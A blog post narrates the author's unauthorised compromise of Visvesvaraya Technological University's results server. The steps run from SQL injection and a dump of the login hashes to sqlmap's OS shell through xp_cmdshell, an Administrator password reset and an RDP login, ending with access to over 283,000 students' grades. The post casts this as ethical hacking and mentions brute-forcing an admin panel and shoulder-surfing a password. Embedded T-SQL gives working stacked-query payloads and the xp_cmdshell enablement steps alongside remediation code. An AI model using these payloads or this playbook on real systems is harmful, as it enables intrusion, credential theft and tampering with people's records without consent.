As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it's way cooler to take over the server directly and gain system SHELL privileges.
Of course, both server-side and client-side vulnerabilities are indispensable in a proper penetration test. Sometimes, in order to take over the server more elegantly, you also need some client-side vulnerabilities to do the trick. But when it comes to finding vulnerabilities, I prefer to find the server-side ones first.
31st August 2016
VTU announced the 2nd semester choice based credit system results. Looking at the grades, I was happy with the results.
From a pentester's point of view, I always want to know how a website functions, and that is how I ended up on this adventure to get to know and learn everything about it.
Visvesvaraya Technological University (VTU) is a collegiate public state university in Karnataka, India. It was established by the Government of Karnataka.
VTU is one of the largest universities in India, with 212 colleges affiliated with it and an intake capacity of over 467,100 undergraduate students and 12,666 postgraduate students. The university covers technical and management fields and offers a total of 30 undergraduate and 71 postgraduate courses. It has around 1800 PhD candidates.
VTU has 13 QIP centers and 17 extension centers in its affiliated colleges offering postgraduate courses. It has around 2,305 departments recognized as research centers, spread across its affiliated institutions in the cities of Karnataka.
Just a quick glance at how big VTU is
VTU offers undergraduate engineering programs that award a Bachelor of Engineering (BE) or Bachelor of Technology (B.Tech) degree. The university offers postgraduate programs that lead to Master of Technology (M.Tech), Master of Science (MSc) by research, Master of Business Administration (MBA), Master of Computer Applications (MCA) and doctorate (PhD) degrees. The MSc and PhD are research degrees, while the rest are taught degrees.
Okay, enough. How on earth did you hack VTU?
We are living in the world of the Internet right now, where everything is connected to the Internet, and anything which is connected to the Internet is easily exploited. According to me, NOTHING and NOBODY is safe when it comes to privacy or security.
Speaking of privacy: it died when you guys accepted all the terms and conditions without reading a single one of them. People just choose security over privacy.
Day 1, 31st August 2016
My friend, who knew that I knew something about hacking (I completed the CEH at the age of 17), advised me to do something to the website. At first I hesitated. Obviously I knew it was not that easy to hack VTU's servers, and doing so could land me behind bars if something went wrong.
To be honest, I never even dreamed that I would successfully compromise the servers. I thought VTU would take the security measures; they would secure their servers at any cost.
Later that evening, when I was back home from college, I checked my grades once again and saw the URL of the website, which was
That was the AHA MOMENT for me.
The URL was catchy: it was not encoded and no validation was applied to that particular GET request. I have done many projects building websites (WordPress, Magento, Java web applications, Drupal, Joomla, etc.), but I had never worked on .NET websites, so I wanted to know how this website was built and how it functions. I did some research and found this.
- Notice results2016.aspx. An .aspx file is an ASP.NET Web Forms page: the server runs its code-behind (usually C# or VB.NET) and sends back the generated HTML. Such pages are typically built with Visual Studio or Visual Web Developer for Microsoft's ASP.NET framework.
- That makes the server almost certainly IIS on Windows. Now notice usn=*****&sem=2. Here usn and sem are the GET parameters that tell the server which record I am asking for.
- All the page does with them is build an SQL query and ask the database for the matching rows, something of the shape SELECT * FROM results WHERE usn='**MyUSN**' AND sem=2 (the table name is a guess; the real query is never shown, but both parameters must end up in a WHERE clause like this one).
- Looking at this, I wanted to know if SQL injection would work.
- Fired up Firefox, which had a handy extension installed called HackBar. Using basic SQL injection techniques, I just inserted a comma at the end of the URL to check whether the website was vulnerable.
- Although I did not get any SQL error message, the page failed to fetch the data from the database.
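To make the inference in the bullets above concrete, here is an added T-SQL example. It is my illustration, not VTU's code and not anything from the original post: a results table and a lookup procedure written the way the page assumes results2016.aspx worked, the stray-quote probe, the stacked-query payloads that turn the same request into a database listing and a login-hash dump (what the narrative below reads back), and the parameterised form that closes the hole. Table, column, procedure and login names are assumptions, the USN format is assumed, and the three rows are constructed. Run it in a scratch database on any SQL Server from 2005 onwards.

```sql
-- Constructed demo data: a results table shaped like the page's usn/sem lookup.
-- Table, column and procedure names are assumptions, not VTU's.
CREATE TABLE dbo.results (
    usn     varchar(10) NOT NULL,   -- e.g. 1AB15CS001 (USN format assumed)
    sem     int         NOT NULL,
    subject varchar(40) NOT NULL,
    marks   int         NOT NULL
);
INSERT INTO dbo.results (usn, sem, subject, marks) VALUES ('1AB15CS001', 2, 'Maths',   72);
INSERT INTO dbo.results (usn, sem, subject, marks) VALUES ('1AB15CS001', 2, 'Physics', 64);
INSERT INTO dbo.results (usn, sem, subject, marks) VALUES ('1AB15CS002', 2, 'Maths',   55);
GO

-- VULNERABLE: the usn and sem query-string values are pasted into the
-- statement text, so a quote inside usn ends the literal and whatever follows
-- is parsed as SQL. The wide parameter types stand in for a web layer that
-- passes the raw GET values through untouched.
CREATE PROCEDURE dbo.GetResult_Vulnerable
    @usn varchar(200), @sem varchar(20)
AS
BEGIN
    DECLARE @sql nvarchar(max);
    SET @sql = N'SELECT subject, marks FROM dbo.results WHERE usn = '''
             + @usn + N''' AND sem = ' + @sem;
    EXEC (@sql);
END;
GO

-- Normal request:  results2016.aspx?usn=1AB15CS001&sem=2
EXEC dbo.GetResult_Vulnerable '1AB15CS001', '2';        -- 2 rows

-- First probe: one stray quote. SQL Server raises "Unclosed quotation mark
-- after the character string"; a page that swallows errors just shows no
-- data, which is the symptom described in the last bullet above.
EXEC dbo.GetResult_Vulnerable '1AB15CS001''', '2';

-- Stacked queries: SQL Server runs a second statement in the same batch, and
-- "--" comments out the trailing " AND sem = 2". This lists every database
-- on the instance (the "9 databases" of the screenshot further down).
EXEC dbo.GetResult_Vulnerable
    '1AB15CS001''; SELECT name FROM sys.databases; --', '2';

-- Same trick against the server logins. password_hash is NULL unless the
-- application's own login holds CONTROL SERVER (sysadmin does). On SQL Server
-- 2005 the value is 0x0100 + 4-byte salt + SHA-1, which is the input that
-- hashcat's MSSQL(2005) mode (-m 132) expects.
EXEC dbo.GetResult_Vulnerable
    '1AB15CS001''; SELECT name, password_hash FROM sys.sql_logins; --', '2';

-- FIXED: the values are bound as parameters, so the parser never sees them
-- as statement text; a quote is just a character that matches no usn.
CREATE PROCEDURE dbo.GetResult_Safe
    @usn varchar(200), @sem int
AS
BEGIN
    -- Allow-list on the assumed USN shape (1 digit, 2 letters, 2 digits,
    -- 2 letters, 3 digits): rejects the payloads before any query runs.
    IF @usn NOT LIKE '[0-9][A-Z][A-Z][0-9][0-9][A-Z][A-Z][0-9][0-9][0-9]'
        RETURN;
    SELECT subject, marks FROM dbo.results WHERE usn = @usn AND sem = @sem;
END;
GO

EXEC dbo.GetResult_Safe '1AB15CS001', 2;                                        -- 2 rows
EXEC dbo.GetResult_Safe '1AB15CS001''; SELECT name FROM sys.databases; --', 2;  -- 0 rows
```

The same separation belongs in the ASP.NET page itself: pass usn and sem as SqlParameter values on the SqlCommand rather than formatting them into the command text, and the quote never reaches the parser no matter what HackBar sends. Note that the stacked-query form is what lets a single injection read sys.databases and sys.sql_logins at all; it also requires that the site's database login be allowed to see those views, which is the first sign that the login had far more privilege than a results page needs.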
And the adventure began…
I wanted to know whether, instead of giving my usn and sem, I could send some other SQL queries.
With a few basic trial-and-error methods and extreme patience, I finally found the injection point and could read and dump all the databases belonging to result.vtu.ac.in.
Took a screenshot so that I could submit it to the VTU officials one day.
A sigh of relief that my time had not been wasted till then.
The above screenshot, taken during the penetration test, shows 9 databases.
NOTE: I'm not an EVIL hacker, and I never even thought of becoming a BLACK HAT. I just love testing and playing with servers; it's kind of an adventure to get to know how the backend really works.
What will an ethical hacker do when he can read the database? Likely he will try to get the users and passwords.
So now I tried to get the MSSQL Server 2005 database passwords. Yes, I did get the password, but it was hashed with a SALT, making it harder to crack.
I may have to blur the hashes for safety reasons.
I tried to crack the hash with hashcat and also with rainbow tables; unfortunately nothing seemed to work. I could not crack the password because the passphrase was complex. It was about 2 in the morning and I was tired. I decided to give up, thinking nothing was going to work now: hacking VTU is impossible and the server is secured.
Day 2, 1st September 2016
Back from college at 4, I again could not get this VTU server thing out of my head. If I could get the password hashes, there must be some other way in.
So I went back to basics and scanned the whole website again, this time scanning the ports with Nmap.
- Port 22: sshd open, but it was maintained by the Cyberoam security company.
- Port 80: httpd 7.5 open.
- Port 8080: https-alt closed.
- Port 1433: ms-sql-server open.
- Port 3389: RDP service open.
What is the difference between an open port and a closed port?
- Closed port: if you send a SYN packet to a closed port, the host responds with a RST. Something is reachable at that address, just not listening on that port.
- Filtered port: presumably the host is behind some sort of firewall. The packet is simply dropped and you receive no response (not even a RST).
- Open port: if you send a SYN packet to an open port, you expect to receive a SYN/ACK.
To be clear, consider an open port as your friend: when you send a SYN packet (Good morning), you expect him to reply with a SYN/ACK (Good morning). Consider a closed port as the principal: your packet does reach him, but all he sends back is a curt RST (go away). Consider a filtered port as a teacher behind a closed staff-room door, i.e. a firewall: the packet is dropped before it reaches anyone, so you get no reply at all and cannot even tell whether someone is there.
Now, the more details you have about the server, the easier it is to find a vulnerability.
By crawling deep into the website I did find some useful URLs. This confirmed to me that Cyberoam was providing the so-called security and hardware resources to VTU, which had no impact: they just failed to secure VTU's servers.
Tried to brute-force the logins of the Cyberoam admin panel, hoping the username would be Admin and the password would be [email protected], exactly like my computer science HOD's login.
How did I come to know my HOD's login? Shoulder surfing. :P Obviously, brute-forcing the users and passwords did not work. I did not use many wordlists; trying too many login attempts in a short interval of time may raise a few eyebrows.
I knew now that I was dealing with someone stronger than VTU when it comes to cyber security, but I had no fear, because my main aim in this penetration test was to find a vulnerability and report it, not to misuse it.
FAILED again. Very frustrated, I had to calm myself down. Had a fun chat with Cyberoam :P
Day 3, 2nd September 2016
Back to ZERO. What to do next? Give up?
Nah. Keep doing something until you get to it. I fired up msfconsole and tried to get a Meterpreter session through the SQL injection.
Tried several exploits. I don't have the Metasploit Pro version, which has the latest exploits. Guys, if you're reading this: "Please give me Metasploit Pro for free."
There were so many moments that made me feel like quitting. I even stopped all the processes and switched off my PC, and again I just could not get this thing out of my mind.
It kept taunting me. Just as many get addicted to smoking, drinking and drugs, it was a clear sign that I was addicted to hacking: sleepless nights constantly forcing me to hack the server.
It was really hard to find the right vulnerability and get into the system.
While trying so many different ways to get into the server, finally, with sqlmap's more advanced options (--tamper, --level and --risk), I got the --os-shell.
On SQL Server, sqlmap's --os-shell gets there by re-enabling the xp_cmdshell extended stored procedure through the sp_configure system procedure, sent over the same injection point, and then running each command via xp_cmdshell and reading its output back through the injection. Flipping that switch requires ALTER SETTINGS on the instance (sysadmin or serveradmin), so the fact that it worked means the login the results page used to reach the database had server-administrator rights; a read-only login could never have done it.
So finally, I got the actual OS shell, i.e. the CMD of the remote server.
What is CMD?
The Command Prompt (cmd.exe) in Windows provides access to over 280 commands. These commands are used to do operating system tasks from a command-line interface instead of the graphical Windows interface we use most of the time.
So, when you have an OS shell, what else can you do? The answer is anything. I was still looking for the full details of the server; here is the screenshot of the systeminfo command.
Went through each and every drive. I had access to almost all the files stored on the VTU server. When you have an actual Administrator shell, what can you do? Almost everything.
NOTE: I did not delete, modify or alter any file saved on the server. All I was doing was for a good cause.
Enumerated the users; surprisingly there were 4 users.
- Administrator (the default one; every Windows computer has one)
I did actually reset the Administrator password by using the net user * command.
Successfully changed the Administrator password. Now I was afraid and concerned, because a Remote Desktop connection can log out the current user and ask for my credentials, as Windows is not a multi-user operating system.
Connected to the server using Guest as the username, just to check if Remote Desktop was enabled. Remember, on Day 2 (1st September 2016), when I scanned the whole site, port 3389 was open, which indicates that RDP (Remote Desktop Protocol) was enabled.
Again, luckily, everything seemed to be going okay from the moment I had the OS shell.
PASSWORD: the one I had reset through the SQL injection.
The moment the computer was logged in.
The SQL Server database was already logged in, so I did not have to waste time guessing the same password again.
It presented a beautiful screen of 283,392 students' marks and grades. Over 2 lakh students' results were in my hands, and if the same access were given to some malicious hacker, I bet you he would have changed all the grades.
At this point I felt sorry for VTU. I never expected this would be so easy to hack. All I needed was patience, basics and a few sleepless nights.
Let's just say VTU is careless at everything: syllabus, exams, evaluation, and a re-evaluation whose only purpose is making money.
I could literally hear my heart pounding. I realized I had gone too far by literally having access to all the students' grades.
What do you guys think I should have done next? Tell VTU that their server was hacked by a teenage boy who did something malicious and dropped all the databases?
The problem was that I did not know how to contact the officials. I did contact VTU twice on their helpline number, but they were in a hurry to just hang up. They had no patience to listen to me. Here are the numbers I tried, as provided on their website: 0831-2498139 and 0831-2498138.
Here’s what I decided to do.
I was able to successfully exploit the server only because of xp_cmdshell, so I manually turned xp_cmdshell off and made sure that no other hacker could exploit the system the same way again.
So xp_cmdshell has been disabled (no hacker can exploit the server the same way I did). <-- I just hope so. :P
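What sqlmap did at the --os-shell step earlier, and what the clean-up just described amounts to, as an added T-SQL example (mine, not the post's own commands and not sqlmap's code). It shows the sp_configure calls that switch xp_cmdshell on, the check that explains why that was possible at all, the off switch the post flipped by hand with a way to verify it, and the least-privilege login that makes the whole stacked-query path fail even if xp_cmdshell is switched on again later. The login, database and table names are assumptions, and the whole script needs a sysadmin connection to a lab instance, never a production server.

```sql
-- 1. Precondition: sp_configure needs ALTER SETTINGS, which sysadmin and
--    serveradmin have. --os-shell only succeeded because the results site's
--    database login was that powerful. 1 = yes, 0 = no.
SELECT IS_SRVROLEMEMBER('sysadmin') AS app_login_is_sysadmin;

-- 2. What sqlmap sends when xp_cmdshell is off (here run by hand).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Every command runs as the SQL Server service account, which on many
-- installs is a highly privileged local account. These are the commands the
-- post ran once it had the shell.
EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'systeminfo';
EXEC master..xp_cmdshell 'net user';        -- the 4-user listing

-- 3. Turning it back off (what the post did manually) and verifying the state.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';                 -- value_in_use = 0

-- 4. Why step 3 on its own is cosmetic: any sysadmin login can run step 2
--    again through the same injection. The durable fix is a login for the web
--    application that can only read the results table.
--    results_web, results_db and dbo.results are assumed names.
CREATE LOGIN results_web WITH PASSWORD = 'Replace-With-A-Long-Random-Secret';
GO
USE results_db;
CREATE USER results_web FOR LOGIN results_web;
GRANT SELECT ON dbo.results TO results_web;
GO

-- Run as that login, the escalation from the injection dies immediately.
-- TRY/CATCH keeps the batch going so both failures are visible.
EXECUTE AS LOGIN = 'results_web';
SELECT IS_SRVROLEMEMBER('sysadmin') AS app_login_is_sysadmin;   -- 0
BEGIN TRY
    EXEC sp_configure 'xp_cmdshell', 1;
END TRY
BEGIN CATCH
    PRINT 'sp_configure refused: ' + ERROR_MESSAGE();           -- no permission
END CATCH;
BEGIN TRY
    EXEC master..xp_cmdshell 'whoami';
END TRY
BEGIN CATCH
    PRINT 'xp_cmdshell refused: ' + ERROR_MESSAGE();            -- no permission
END CATCH;
REVERT;
```

The point of step 4 is that disabling xp_cmdshell only removes one tool; the vulnerability that matters is the combination of an injectable query and a sysadmin login behind it. With a login that holds nothing but SELECT on one table, the same injection can still leak that table, but it can no longer list other databases, read sys.sql_logins hashes, or reach the operating system.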
At this point I really do feel sorry for VTU. I never expected this to be so easy, or let us say that they are very careless at everything.
The Administrator password was reset by the VTU officials within a few hours of the compromise.
By doing that, let's just say VTU did realize that their server's Administrator password had been changed and the server hacked.
Not only did I compromise the system, but the other way around, I also helped VTU secure their vulnerable server. :P
After disabling xp_cmdshell I lost the connection.
NOTE: I have officially lost all access to the server, and the application is no longer vulnerable to SQL injection. A few days later, Event Validation was enabled, making sure that other malicious hackers could not inject anything.
Thanks to my friend Rohan, who always had my back, making sure that I did not make a stupid decision and land in trouble.
I DID NOT MODIFY, ALTER OR DELETE ANY FILES BELONGING TO THEIR SERVER.
People say that what I did was wrong and that I should be ashamed of it, but after what I have been through, I have no regrets about what I have done.
– Before making any attack, get the other party's consent.
– All of this is for learning.
– Do not try this in public.
– I have nothing to do with it if you end up in any legal issues.